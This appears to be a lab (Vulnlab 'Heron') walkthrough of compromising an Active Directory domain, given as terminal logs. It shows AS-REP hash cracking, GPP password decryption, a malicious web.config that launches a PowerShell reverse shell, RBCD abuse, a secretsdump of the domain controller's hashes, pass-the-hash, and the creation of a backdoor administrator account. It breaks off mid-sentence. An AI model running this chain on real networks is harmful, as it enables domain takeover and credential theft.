hashcat (v6.2.6) starting


Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$samuel.davies@HERON.VL:5253809049f054...3b2101
Time.Started.....: Fri Aug  2 15:06:30 2024 (0 secs)
Time.Estimated...: Fri Aug  2 15:06:30 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)

Started: Fri Aug  2 15:06:29 2024
Stopped: Fri Aug  2 15:06:32 2024

With the password recovered, we run a BloodHound collection as samuel.davies:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 bloodhound-python -d 'heron.vl' -u 'samuel.davies' -p 'l6<redacted>oN' -c all -ns 10.10.148.85 --zip 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
INFO: Found AD domain: heron.vl
INFO: Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 5 computers
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK
INFO: Found 28 users
INFO: Found 59 groups
INFO: Found 5 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frajmp.heron.vl
INFO: Querying computer: 
INFO: Querying computer: 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.86:445 INFO: Querying computer: 
INFO: Querying computer: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445 <--socket error or timeout!
 ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
INFO: Done in 00M 07S
INFO: Compressing output into 20240802151131_bloodhound.zip

Getting the full user list with ldapsearch (the pipeline keeps only the userPrincipalName of every object):

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 ldapsearch -x -LLL -H ldap://mucdc.heron.vl -D 'samuel.davies@heron.vl' -b 'DC=heron,DC=vl' -w 'l6<redacted>oN' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK

SMB enum

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient -L 10.10.148.85 -U 'samuel.davies'   
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Password for [WORKGROUP\samuel.davies]:

    Sharename       Type      Comment
    ---------       ----      -------
    accounting$     Disk      
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    CertEnroll      Disk      Active Directory Certificate Services share
    home$           Disk      
    IPC$            IPC       Remote IPC
    it$             Disk      
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    transfer$       Disk      
Reconnecting with SMB1 for workgroup listing.
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:139  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:139  ...  OK
do_connect: Connection to 10.10.148.85 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Browsing SYSVOL over SMB, we find a Groups.xml under a GPO's Machine\Preferences\Groups: a Group Policy Preferences file carrying a cpassword attribute, i.e. a password that every domain user can read.

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\SYSVOL -U 'samuel.davies'   
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\samuel.davies]:
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 26 11:37:40 2024
  ..                                  D        0  Sun May 26 11:37:40 2024
  heron.vl                           Dr        0  Sun May 26 11:37:40 2024

        6261499 blocks of size 4096. 1958913 blocks available
smb: \> cd heron.vl
smb: \heron.vl\> ls
  .                                   D        0  Sun May 26 11:38:59 2024
  ..                                  D        0  Sun May 26 11:37:40 2024
  DfsrPrivate                      DHSr        0  Sun May 26 11:38:59 2024
  Policies                            D        0  Tue Jun  4 17:57:41 2024
  scripts                             D        0  Sun Jun  2 12:42:56 2024

        6261499 blocks of size 4096. 1958913 blocks available
smb: \heron.vl\> cd Policies
smb: \heron.vl\Policies\> ls
  .                                   D        0  Tue Jun  4 17:57:41 2024
  ..                                  D        0  Sun May 26 11:38:59 2024
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sun May 26 11:37:44 2024
  {3FFDA928-A6D1-4860-936F-25D9D2D7EAEF}      D        0  Sun May 26 12:21:54 2024
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sun May 26 11:37:44 2024
  {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}      D        0  Tue Jun  4 17:57:41 2024
  {866ECED1-24B0-46EF-92F5-652345A1820C}      D        0  Sun May 26 12:23:29 2024

        6261499 blocks of size 4096. 1958912 blocks available
smb: \heron.vl\Policies\> cd {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> ls
  .                                   D        0  Tue Jun  4 17:57:41 2024
  ..                                  D        0  Tue Jun  4 17:57:41 2024
  GPT.INI                             A       59  Tue Jun  4 18:00:13 2024
  Machine                             D        0  Tue Jun  4 17:59:44 2024
  User                                D        0  Tue Jun  4 17:57:41 2024

        6261499 blocks of size 4096. 1958910 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> cd Machine
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:57:41 2024
  Preferences                         D        0  Tue Jun  4 17:59:44 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> cd Preferences
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:59:44 2024
  Groups                              D        0  Tue Jun  4 17:59:44 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> cd Groups
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:59:44 2024
  Groups.xml                          A     1135  Tue Jun  4 18:01:07 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> get Groups.xml
getting file \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\Groups.xml of size 1135 as Groups.xml (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> 

GPP encrypted password

pip3 install pycryptodome colorama
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py 

                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         

usage: python3 gpp-decrypt.py -f [groups.xml]
gpp-decrypt.py: error: one of the arguments -f/--file -c/--cpassword is required
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py -c 1G19pP9gbIPUr5xLeKhEUg==

                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         

[ * ] Password: H3<redacted>#!
puck@edge-meppel:~/gpp-decrypt$

With the H3<redacted>#! password, valid for the user svc-web-accounting-d, we can access SMB

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\accounting$ -U 'svc-web-accounting-d'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\svc-web-accounting-d]:H3r<redacted>#!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  7 08:14:04 2024
  ..                                DHS        0  Sun Jun  2 17:26:14 2024
  AccountingApp.deps.json             A    37407  Sun Jun  2 21:25:26 2024
  AccountingApp.dll                   A    89600  Sun Jun  2 21:25:26 2024
  AccountingApp.exe                   A   140800  Sun Jun  2 21:25:26 2024
  AccountingApp.pdb                   A    39488  Sun Jun  2 21:25:26 2024
  AccountingApp.runtimeconfig.json      A      557  Sun Jun  2 00:22:20 2024
  appsettings.Development.json        A      127  Sun Jun  2 00:00:54 2024
  appsettings.json                    A      237  Sun Jun  2 00:03:50 2024
  FinanceApp.db                       A   106496  Sat Jun  1 16:09:00 2024
  Microsoft.AspNetCore.Authentication.Negotiate.dll      A    53920  Wed Nov  1 10:08:26 2023
  Microsoft.AspNetCore.Cryptography.Internal.dll      A    52912  Mon May 20 14:23:52 2024
  Microsoft.AspNetCore.Cryptography.KeyDerivation.dll      A    23712  Mon May 20 14:23:56 2024
  Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll      A   108808  Mon May 20 14:24:24 2024
  Microsoft.Data.Sqlite.dll           A   172992  Mon May 20 09:54:40 2024
  Microsoft.EntityFrameworkCore.Abstractions.dll      A    34848  Mon May 20 09:54:30 2024
  Microsoft.EntityFrameworkCore.dll      A  2533312  Mon May 20 09:55:04 2024
  Microsoft.EntityFrameworkCore.Relational.dll      A  1991616  Mon May 20 09:55:20 2024
  Microsoft.EntityFrameworkCore.Sqlite.dll      A   257456  Mon May 20 09:55:30 2024
  Microsoft.Extensions.DependencyModel.dll      A    79624  Tue Oct 31 23:59:24 2023
  Microsoft.Extensions.Identity.Core.dll      A   177840  Mon May 20 14:24:10 2024
  Microsoft.Extensions.Identity.Stores.dll      A    45232  Mon May 20 14:24:20 2024
  Microsoft.Extensions.Options.dll      A    64776  Thu Jan 18 12:05:26 2024
  runtimes                            D        0  Sat Jun  1 16:51:32 2024
  SQLitePCLRaw.batteries_v2.dll       A     5120  Thu Aug 24 04:41:24 2023
  SQLitePCLRaw.core.dll               A    50688  Thu Aug 24 04:38:38 2023
  SQLitePCLRaw.provider.e_sqlite3.dll      A    35840  Thu Aug 24 04:38:52 2023
  System.DirectoryServices.Protocols.dll      A    71944  Wed Nov  1 00:00:24 2023
  web.config                          A      554  Thu Jun  6 16:41:39 2024
  wwwroot                             D        0  Sat Jun  1 16:51:32 2024

        6261499 blocks of size 4096. 1957663 blocks available
smb: \> 

.

We remove web.config, and then upload a modified web.config

I used this one:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
    <system.webServer>
    <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
    </handlers>
    <aspNetCore processPath="powershell" arguments="-e ..snip.." hostingModel="OutOfProcess" />
    </system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Then I opened http://accounting.heron.vl in Firefox through proxychains,

logged in as svc-web-accounting-d with the H3<redacted>#! password, and then visited http://accounting.heron.vl/execute.now to trigger it

or use curl like this

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains curl -u:svc-web-accounting:H3<redacted>#! http://accounting.heron.vl/execute.now
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  accounting.heron.vl:80  ...  OK

 

and caught the reverse shell back on my Kali box

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ nc -nlvp 9001                
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.177.37] 58560

PS C:\webaccounting> cd c:\windows\scripts
PS C:\windows\scripts> dir


    Directory: C:\windows\scripts


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/6/2024   7:12 AM           1416 dns.ps1                                                              
-a----          6/1/2024   8:26 AM            221 ssh.ps1                                                              


PS C:\windows\scripts> type ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "De<redacted>lt"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"
PS C:\windows\scripts>                      

Checked that Defender is running (Get-MpComputerStatus) on MUCDC; it kills the session after about 1 min, so visit http://accounting.heron.vl/execute.now again if you need more time…

Privesc on the Ubuntu box

pentest@frajmp:/tmp$ su _local
Password: 
_local@frajmp:/tmp$ sudo -l
[sudo] password for _local: 
Matching Defaults entries for _local on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User _local may run the following commands on localhost:
    (ALL : ALL) ALL
_local@frajmp:/tmp$ sudo su
root@frajmp:/tmp# cd /root
root@frajmp:~# ls
flag.txt  snap
root@frajmp:~# cat flag.txt
VL{51<redacted>60}

Transfer /etc/krb5.keytab to the Kali box with nc, and run keytabextract.py on it

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ python3 keytabextract.py krb5.keytab           
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
    REALM : HERON.VL
    SERVICE PRINCIPAL : FRAJMP$/
    NTLM HASH : 6f<redacted>f7
    AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
    AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd

We do some more enumeration and find that Depl<redacted>Dealt works for julian.pratt

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.134.197\\home$ -U 'julian.pratt'     
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\julian.pratt]: Depl<redacted>Dealt
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:445  ...  OK
Try "help" to get a list of possible commands.
smb: \>
smb: \> cd Julian.Pratt
smb: \Julian.Pratt\> dir
  .                                   D        0  Sun Jun  2 12:47:14 2024
  ..                                  D        0  Sat Jun  1 17:10:46 2024
  frajmp.lnk                          A     1443  Sun Jun  2 12:47:47 2024
  Is there a way to -auto login- in PuTTY with a password- - Super User.url      A      117  Sat Jun  1 17:44:44 2024
  Microsoft Edge.lnk                  A     2312  Sat Jun  1 17:44:38 2024
  mucjmp.lnk                          A     1441  Sun Jun  2 12:47:33 2024

        6261499 blocks of size 4096. 1985339 blocks available
smb: \Julian.Pratt\> mget *.lnk
Get file frajmp.lnk? y
getting file \Julian.Pratt\frajmp.lnk of size 1443 as frajmp.lnk (17.2 KiloBytes/sec) (average 17.2 KiloBytes/sec)
Get file Microsoft Edge.lnk? y
getting file \Julian.Pratt\Microsoft Edge.lnk of size 2312 as Microsoft Edge.lnk (26.9 KiloBytes/sec) (average 22.1 KiloBytes/sec)
Get file mucjmp.lnk? y
getting file \Julian.Pratt\mucjmp.lnk of size 1441 as mucjmp.lnk (17.8 KiloBytes/sec) (average 20.7 KiloBytes/sec)
smb: \Julian.Pratt\> 

.

From BloodHound, we find that adm_prju is a member of the ADMINS_T1 group, which has the WriteAccountRestrictions privilege over MUCDC.

WriteAccountRestrictions gives adm_prju write access to the account-restriction attributes of the MUCDC machine account, notably msDS-AllowedToActOnBehalfOfOtherIdentity. Being able to modify that attribute lets us abuse resource-based constrained delegation.

Next do the RBCD (Resource-Based Constrained Delegation) write:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -dc-ip 10.10.165.85 -action 'write' 'heron.vl/adm_prju:ay<redacted>B4' 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:389  ...  OK
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FRAJMP$ can now impersonate users on MUCDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FRAJMP$      (S-1-5-21-1568358163-2901064146-3316491674-27101)
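What impacket-rbcd actually wrote into msDS-AllowedToActOnBehalfOfOtherIdentity, as an added Go example (not impacket's code): the attribute holds a binary security descriptor whose DACL lists the accounts allowed to delegate, and a defender auditing that attribute on every computer object reads it the same way. The byte blob is constructed to the layout impacket-rbcd produces (owner and group BUILTIN\Administrators, one ACCESS_ALLOWED ACE with mask 0xF01FF) using FRAJMP$'s SID from the output above.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

var le = binary.LittleEndian

// Constructed sample of what the attribute holds after the rbcd write above, in
// the layout impacket-rbcd produces, with FRAJMP$'s SID from the output as trustee.
var sampleRBCD = []byte{
	0x01, 0x00, 0x04, 0x80, // Revision 1, Sbz1, Control = SE_SELF_RELATIVE | SE_DACL_PRESENT
	0x14, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, // OffsetOwner, OffsetGroup = 20 (right after the header)
	0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, // OffsetSacl = 0 (none), OffsetDacl = 36
	0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, // S-1-5-32-544
	0x04, 0x00, 0x2c, 0x00, 0x01, 0x00, 0x00, 0x00, // ACL: AclRevision 4, Sbz1, AclSize 44, AceCount 1, Sbz2
	0x00, 0x00, 0x24, 0x00, 0xff, 0x01, 0x0f, 0x00, // ACE: ACCESS_ALLOWED, AceFlags 0, AceSize 36, Mask 0xF01FF
	0x01, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x15, 0x00, 0x00, 0x00, // SID: rev 1, 5 sub-auths, NT authority, 21
	0x13, 0x3f, 0x7b, 0x5d, 0xd2, 0xb9, 0xea, 0xac, // 1568358163, 2901064146
	0x9a, 0xa5, 0xad, 0xc5, 0xdd, 0x69, 0x00, 0x00, // 3316491674, 27101 (FRAJMP$)
}

// sidString decodes a binary SID (MS-DTYP 2.4.2.2) that starts at b[0].
func sidString(b []byte) (string, error) {
	if len(b) < 8 || len(b) < 8+4*int(b[1]) { return "", errors.New("truncated SID") }
	var auth uint64 // 48-bit identifier authority, big-endian
	for _, x := range b[2:8] { auth = auth<<8 | uint64(x) }
	s := fmt.Sprintf("S-%d-%d", b[0], auth)
	for i := 0; i < int(b[1]); i++ { s += fmt.Sprintf("-%d", le.Uint32(b[8+4*i:])) }
	return s, nil
}

// AllowedToActSIDs walks the DACL of a self-relative security descriptor and
// returns the trustee of every ACCESS_ALLOWED ACE: the accounts permitted to act
// on behalf of other identities towards this computer. Run over the attribute of
// every computer object, any SID you cannot explain is a finding.
func AllowedToActSIDs(sd []byte) ([]string, error) {
	if len(sd) < 20 || sd[0] != 1 || le.Uint16(sd[2:])&0x0004 == 0 {
		return nil, errors.New("not a revision-1 descriptor with a DACL")
	}
	off := int(le.Uint32(sd[16:]))
	if off < 20 || off+8 > len(sd) { return nil, errors.New("DACL offset out of range") }
	p, out := off+8, []string{}
	for i := 0; i < int(le.Uint16(sd[off+4:])); i++ { // AceCount
		if p+8 > len(sd) { return nil, errors.New("truncated ACE") }
		size := int(le.Uint16(sd[p+2:]))
		if size < 8 || p+size > len(sd) { return nil, errors.New("malformed ACE size") }
		if sd[p] == 0x00 { // ACCESS_ALLOWED_ACE_TYPE; other types carry no grant
			s, err := sidString(sd[p+8 : p+size])
			if err != nil { return nil, err }
			out = append(out, s)
		}
		p += size
	}
	return out, nil
}

func main() {
	fmt.Println(AllowedToActSIDs(sampleRBCD)) // [S-1-5-21-1568358163-2901064146-3316491674-27101] <nil>
}
```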

Get the ticket

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-getST -spn 'cifs/mucdc.heron.vl' -impersonate '_admin' 'heron.vl/FRAJMP$' -hashes :6f<redacted>f7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  HERON.VL:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  HERON.VL:88  ...  OK
[*] Impersonating _admin
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  heron.vl:88  ...  OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  heron.vl:88  ...  OK
[*] Saving ticket in _admin@cifs_mucdc.heron.vl@HERON.VL.ccache
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ export KRB5CCNAME=_admin@cifs_mucdc.heron.vl@HERON.VL.ccache        

and do a secretsdump

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-secretsdump -k mucdc.heron.vl 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7a8b61a266b3e6ba7b55725d51f2b723
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:36<redacted>4e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HERON\MUCDC$:plain_password_hex:6ba8a<redacted>3adc3
HERON\MUCDC$:aad3b435b51404eeaad3b435b51404ee:a3623<redacted>94ee:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x76a0d28b7925171e2b82994b58e5991310b49216
dpapi_userkey:0xda9a3255d163e84c6ab4e578f44c544e80285f19
[*] NL$KM 
 0000   5C A7 E2 A0 9A 0F 0E A7  0A 6F 35 33 21 07 83 01   \........o53!...
 0010   93 8A 8A 6D 21 3B C2 CA  60 E6 E6 B6 5A 22 04 A2   ...m!;..`...Z"..
 0020   D1 F4 93 69 36 20 AF BB  F7 38 31 3A BE E5 D5 29   ...i6 ...81:...)
 0030   55 5E 2B 54 ED A4 1B 52  03 FD 77 75 AC F2 9A 58   U^+T...R..wu...X
NL$KM:5ca7e2a09a0f0ea70a6f353321078301938a8a6d213bc2ca60e6e6b65a2204a2d1f493693620afbbf738313abee5d529555e2b54eda41b5203fd7775acf29a58
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:49667  ...  OK
_admin:500:aad3b435b51404eeaad3b435b51404ee:39<redacted>38:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c586ab9529b5a6445e501b2208403f2:::
heron.vl\Katherine.Howard:24575:aad3b435b51404eeaad3b435b51404ee:654<redacted>d2:::

Get the flags

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.165.85\\C$ -U '_admin' --pw-nt-hash 39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Thu Jun  6 17:01:47 2024
  --snip--
  System Volume Information         DHS        0  Sun May 26 11:48:42 2024
  transfer                            D        0  Sun May 26 13:51:27 2024
  Users                              DR        0  Sat Jun  1 17:43:04 2024
  webaccounting                       D        0  Fri Jun  7 08:14:04 2024
  Windows                             D        0  Sun Jun  2 17:26:03 2024

        6261499 blocks of size 4096. 1962809 blocks available

Beyond root

proxychains xfreerdp /u:_admin /pth:39<redacted>38 /w:1566 /h:968 /v:10.10.134.197:3389
 -> RDP into MUCDC is not allowed


┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-wmiexec _admin@10.10.134.197 -hashes aad3b435b51404eeaad3b435b51404ee:39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:49669  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
heron\_admin

C:\>net user /add puck Password123!
The command completed successfully.


C:\>net localgroup Administrators puck /add[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:135  ...  OK

The command completed successfully.


$ proxychains xfreerdp /u:puck /p:Password123! /w:1566 /h:968 /v:10.10.134.197:3389


---
C:\Users\puck>net user adm_hoka
User name                    adm_hoka
Full Name                    adm_hoka
Comment                      t0
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2024 4:50:28 AM
Password expires             Never
Password changeable          5/27/2024 4:50:28 AM
Password required            Yes
User may change password     Yes

Workstations allowed         admjmp_t0
Logon script                 \\heron.vl\SYSVOL\heron.vl\scripts\logon.vbs
User profile
Home directory               \\mucdc.heron.vl\home$\adm_hoka
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *admins_t0
The command completed successfully.

---
logon.vbs contains:
